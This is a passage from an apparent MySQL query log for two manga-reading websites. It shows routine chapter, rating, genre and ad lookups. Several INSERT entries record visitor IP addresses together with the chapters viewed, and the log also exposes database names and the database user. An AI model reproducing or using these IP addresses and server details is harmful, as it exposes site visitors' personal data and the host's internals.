(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '384' order by created desc 330654547 Quit 330654548 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654548 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '291' order by created desc 330654548 Quit 330654549 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654549 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '359' order by created desc 330654549 Quit 330654550 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654550 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '377' order by created desc 330654550 Quit 330654551 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654551 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '378' order by created desc 330654551 Quit 330654552 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654552 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '282' order by created desc 330654552 Quit 330654553 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654553 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '345' order by created desc 330654553 Quit 330654554 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654554 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '296' order by created desc 330654554 Quit 330654555 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654555 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '360' order by created desc 330654555 Quit 330654556 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654556 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '383' order by created desc 330654556 Quit 330654557 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654557 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '375' order by created desc 330654557 Quit 330654558 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654558 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '305' order by created desc 330654558 Quit 330654559 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654559 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '385' order by created desc 330654559 Quit 330654560 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654560 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '369' order by created desc 330654560 Quit 330654561 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654561 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '387' order by created desc 330654561 Quit 260225 19:29:31 330654562 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654562 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '362' order by created desc 330654562 Quit 330654563 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654563 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '388' order by created desc 330654563 Quit 330654564 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654564 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '364' order by created desc 330654564 Quit 330654565 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654565 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '389' order by created desc 330654565 Quit 330654566 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654566 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '365' order by created desc 330654566 Quit 330654567 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654567 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '379' order by created desc 330654567 Quit 330654568 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654568 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '370' order by created desc 330654568 Quit 330654569 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654569 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '390' order by created desc 330654569 Quit 330654570 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654571 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654570 Quit 330654571 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654571 Quit 330654217 Quit 330654572 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654573 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654572 Quit 330654573 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654573 Quit 330654574 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654575 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654574 Quit 330654575 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654575 Quit 330654576 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654577 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654576 Quit 330654577 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654577 Quit 330654578 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654579 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654578 Quit 330654579 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654579 Quit 260225 19:29:32 330654580 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654581 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654580 Quit 330654581 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330654581 Quit 330654582 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654582 Query select * FROM chapters where id = '18101' 330654582 Quit 330654583 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654583 Query select * FROM chapters where manga_id = '197' order by id desc 330654583 Quit 330654584 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654584 Query Update chapters set view=view+1 where id = '18101' 330654584 Quit 330654585 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654585 Query select * FROM chapters where id = '18101' 330654585 Quit 330654586 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654586 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '18101' 330654586 Quit 330654587 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654587 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '18101', '91.109.163.147', 'mangacherri.com', '2026-02-26 03:29:32', '2026-02-26 03:29:32') 330654587 Quit 330654588 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654588 Query select * FROM chapter_images where chapter_id = '18101' 330654588 Quit 330654589 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654589 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330654589 Quit 330654590 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654590 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330654591 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654592 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654591 Quit 330654592 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1124' 330654592 Quit 330654593 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654593 Query select * FROM chapters where id = '1124' 330654593 Quit 330654594 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654594 Query select * FROM chapters where manga_id = '33' order by id desc 330654594 Quit 330654595 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654595 Query Update chapters set view=view+1 where id = '1124' 330654595 Quit 330654596 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654596 Query select * FROM chapters where id = '1124' 330654597 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654596 Quit 330654597 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '1124' 330654597 Quit 330654598 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654598 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('33', '1124', '67.220.94.158', 'mangacherri.com', '2026-02-26 03:29:32', '2026-02-26 03:29:32') 330654598 Quit 330654599 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654599 Query select * FROM chapter_images where chapter_id = '1124' 330654599 Quit 330654600 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654600 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '33' and m.active = 1 330654600 Quit 330654601 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654601 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='33' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330654590 Quit 330654602 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654603 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654602 Quit 330654603 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654603 Quit 330654604 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654605 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654604 Quit 330654605 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654605 Quit 330654606 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654607 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654606 Quit 330654607 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654607 Quit 330654608 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654609 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654608 Quit 330654609 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654609 Quit 260225 19:29:33 330654601 Quit 330654610 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654611 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654610 Quit 330654611 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654611 Quit 330654612 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654613 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654612 Quit 330654613 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654613 Quit 330654614 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654615 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654615 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654614 Quit 330654615 Quit 330654616 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654617 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654617 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654616 Quit 330654617 Quit 330654618 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654619 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654618 Quit 330654619 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17360' 330654619 Quit 330654620 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654620 Query select * FROM chapters where id = '17360' 330654620 Quit 330654621 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654621 Query select * FROM chapters where manga_id = '197' order by id desc 330654621 Quit 330654622 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654622 Query Update chapters set view=view+1 where id = '17360' 330654622 Quit 330654623 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654623 Query select * FROM chapters where id = '17360' 330654623 Quit 330654624 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654624 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '17360' 330654624 Quit 330654625 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654625 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('197', '17360', '114.10.149.144', 'mangacherri.com', '2026-02-26 03:29:33', '2026-02-26 03:29:33') 330654625 Quit 330654626 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654626 Query select * FROM chapter_images where chapter_id = '17360' 330654626 Quit 330654627 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654627 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '197' and m.active = 1 330654627 Quit 330654628 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654628 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='197' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%Shoujo%') ORDER BY RAND() limit 10 330654629 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654630 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654629 Quit 330654630 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12227' 330654630 Quit 330654631 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654631 Query select * FROM chapters where id = '12227' 330654631 Quit 330654632 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654632 Query select * FROM chapters where manga_id = '193' order by id desc 330654632 Quit 330654633 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654633 Query Update chapters set view=view+1 where id = '12227' 330654633 Quit 330654634 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654634 Query select * FROM chapters where id = '12227' 330654634 Quit 330654635 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654635 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12227' 330654635 Quit 330654636 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654636 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, created, modified) VALUES ('193', '12227', '216.26.225.147', '2026-02-26 03:29:33', '2026-02-26 03:29:33') 330654636 Quit 330654637 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654637 Query select * FROM chapter_images where chapter_id = '12227' 330654637 Quit 330654638 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654639 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654638 Quit 330654639 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '193' 330654639 Quit 330654640 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654640 Query select * FROM chapters where manga_id = '193' order by id desc 330654640 Quit 330654641 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654642 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654641 Quit 330654642 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654642 Quit 330654643 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654644 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654643 Quit 330654644 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12712' and m.active = 1 330654644 Quit 330654645 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654645 Query select * FROM chapters where id = '12712' 330654645 Quit 330654646 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654646 Query select * FROM chapters where manga_id = '27' order by display_priority ASC, id desc 330654646 Quit 330654647 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654647 Query Update chapters set view=view+1 where id = '12712' 330654647 Quit 330654648 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654648 Query select * FROM chapters where id = '12712' 330654648 Quit 330654649 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654649 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '12712' and m.active = 1 330654649 Quit 330654650 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654650 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '12712', '12.74.222.7', 'mangaberri.com', '2026-02-26 03:29:33', '2026-02-26 03:29:33') 330654650 Quit 330654651 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654651 Query select * FROM chapter_images where chapter_id = '12712' 330654651 Quit 330654652 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654652 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330654652 Quit 330654653 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654653 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Action%' OR genres like '%Martial Arts%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330654653 Quit 330654654 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654655 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654654 Quit 330654655 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654655 Quit 330654656 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654657 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654656 Quit 330654657 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654657 Quit 330654658 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654659 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654658 Quit 330654659 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654659 Quit 330654660 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654661 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654660 Quit 330654661 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654661 Quit 330654662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654662 Quit 330654663 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6221' 330654663 Quit 330654664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654664 Query select * FROM chapters where id = '6221' 330654664 Quit 330654665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654665 Query select * FROM chapters where manga_id = '27' order by id desc 330654665 Quit 330654666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654666 Query Update chapters set view=view+1 where id = '6221' 330654666 Quit 330654667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654667 Query select * FROM chapters where id = '6221' 330654668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654667 Quit 330654668 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '6221' 330654668 Quit 330654669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654669 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('27', '6221', '37.39.172.209', 'mangacherri.com', '2026-02-26 03:29:33', '2026-02-26 03:29:33') 330654669 Quit 330654670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654670 Query select * FROM chapter_images where chapter_id = '6221' 330654670 Quit 330654671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654671 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '27' and m.active = 1 330654672 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654674 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654671 Quit 330654672 Quit 330654674 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '219' and m.active = 1 330654673 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='27' and m.active = 1 AND (genres like '%Comedy%' OR genres like '%Romance%' OR genres like '%School%' OR genres like '%Shounen%') ORDER BY RAND() limit 10 330654674 Quit 330654675 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654675 Query select * FROM chapters where id = '219' 330654675 Quit 330654676 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654676 Query select * FROM chapters where manga_id = '20' order by display_priority ASC, id desc 330654676 Quit 330654677 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654677 Query Update chapters set view=view+1 where id = '219' 330654677 Quit 330654678 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654678 Query select * FROM chapters where id = '219' 330654679 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654679 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '219' and m.active = 1 330654678 Quit 330654679 Quit 330654680 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654680 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('20', '219', '50.203.254.252', 'mangaberri.com', '2026-02-26 03:29:33', '2026-02-26 03:29:33') 330654680 Quit 330654681 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654681 Query select * FROM chapter_images where chapter_id = '219' 330654681 Quit 330654682 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654682 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '20' and m.active = 1 330654682 Quit 330654683 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654683 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='20' and m.active = 1 AND (genres like '%Action%' OR genres like '%Comedy%' OR genres like '%Martial Arts%' OR genres like '%Sci-Fi%' OR genres like '%Shounen%' OR genres like '%Space%' OR genres like '%Super Power%') ORDER BY RAND() limit 10 330654683 Quit 330654684 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654685 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654684 Quit 330654685 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654685 Quit 330654686 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654687 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654686 Quit 330654687 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654687 Quit 330654688 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654689 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654688 Quit 330654689 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654689 Quit 330654690 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654691 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330654690 Quit 330654691 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654691 Quit 260225 19:29:34 330654628 Quit 330654692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654692 Quit 330654693 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330654693 Quit 330654694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654694 Quit 330654695 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654695 Quit 330654696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654697 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654696 Quit 330654697 Quit 330654698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654699 Query SELECT direct_url FROM ads_scripts WHERE placement = 'head' AND is_active = 1 AND ad_type = 'direct' AND direct_url IS NOT NULL AND direct_url <> '' ORDER BY sort_order ASC, id DESC LIMIT 1 330654698 Quit 330654699 Quit 330654700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654700 Quit 330654701 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10884' 330654701 Quit 330654702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654702 Query select * FROM chapters where id = '10884' 330654702 Quit 330654703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654703 Query select * FROM chapters where manga_id = '127' order by id desc 330654703 Quit 330654704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654704 Query Update chapters set view=view+1 where id = '10884' 330654704 Quit 330654705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654705 Query select * FROM chapters where id = '10884' 330654706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654705 Quit 330654706 Query select m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) where c.id = '10884' 330654706 Quit 330654707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654707 Query INSERT INTO chapter_views (manga_id, chapter_id, ip, source, created, modified) VALUES ('127', '10884', '180.242.192.96', 'mangacherri.com', '2026-02-26 03:29:34', '2026-02-26 03:29:34') 330654707 Quit 330654708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654708 Query select * FROM chapter_images where chapter_id = '10884' 330654708 Quit 330654709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654709 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '127' 